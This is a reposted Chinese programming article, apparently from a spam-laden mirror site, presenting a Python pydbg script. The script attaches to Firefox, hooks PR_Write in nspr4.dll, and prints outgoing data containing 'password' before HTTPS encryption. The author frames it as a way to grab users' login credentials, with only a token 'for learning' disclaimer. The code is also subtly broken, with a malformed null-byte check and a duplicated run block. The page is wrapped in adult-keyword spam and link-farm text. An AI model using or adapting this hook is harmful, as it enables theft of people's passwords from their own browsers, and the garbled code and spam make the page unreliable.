国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > Python > 正文

python利用hook技術破解https的實例代碼

2019-11-25 18:39:32
字體:
來源:轉載
供稿:網友

相對于http協議,http是的特點就是他的安全性,http協議的通信內容用普通的嗅探器可以捕捉到,但是https協議的內容嗅探到的是加密后的內容,對我們的利用價值不是很高,所以一些大的網站----涉及到“大米”的網站,采用的都是http是協議,嘿嘿,即便這樣,還是有辦法能看到他的用戶名和密碼的,嘿嘿,本文只是用于技術學習,只是和大家交流技術,希望不要用于做違法的事情,這個例子是在firefox瀏覽器下登錄https協議的網站,我們預先打開程序,就來了個捕獲用戶名和密碼:

下面是源代碼:

復制代碼 代碼如下:

#!/ur/bin/env python    
from pydbg import *
from pydbg.defines import *

import utils    
import sys    

dbg = pydbg()    
found_firefox = False

pattern = "password"

         
def ssl_sniff( dbg, args ):    
    buffer = ""    
    offset = 0

    while 1:    
        byte = dbg.read_process_memory( args[1] + offset, 1 )    
        if byte != "x00":    
            buffer += byte    
            offset += 1
            continue
        else:    
            break
    if pattern in buffer:    
        print "Pre-Encrypted: %s" % buffer
    return DBG_CONTINUE    
# 尋找firefox.exe的進程    
for (pid, name) in dbg.enumerate_processes():    
    if name.lower() == "firefox.exe":    
        found_firefox = True
        hooks = utils.hook_container()    
        dbg.attach(pid)    
        print "[*] Attaching to firefox.exe with PID: %d" % pid    
# 得到firefox的hook的 address    
        hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")    
        if hook_address:    
# 添加hook的內容,包括他的pid,地址,嗅探類型   

            hooks.add( dbg, hook_address, 2, ssl_sniff, None )    
            print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address    
            break
        else:    
            print "[*] Error: Couldn't resolve hook address."
            sys.exit(-1)    
        if found_firefox:    
            print "[*] Hooks set, continuing process."
            dbg.run()    
        else:    
                print "[*] Error: Couldn't find the firefox.exe process."
                sys.exit(-1)    

if found_firefox:    
    print "[*] Hooks set, continuing process."
    dbg.run()    
else:    
    print "[*] Error: Couldn't find the firefox.exe process."
    sys.exit(-1)

轉自:http://world77.blog.51cto.com/414605/518679

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 临潭县| 茶陵县| 沧源| 株洲县| 会泽县| 全椒县| 密云县| 兖州市| 枣强县| 霍州市| 通州市| 天津市| 陇西县| 公安县| 清丰县| 仙桃市| 九台市| 旬邑县| 台前县| 高邑县| 济阳县| 辽中县| 丁青县| 东山县| 江口县| 东乌| 邳州市| 通江县| 曲麻莱县| 新泰市| 滨海县| 基隆市| 开阳县| 钟祥市| 永丰县| 梓潼县| 波密县| 新源县| 松溪县| 饶河县| 永修县|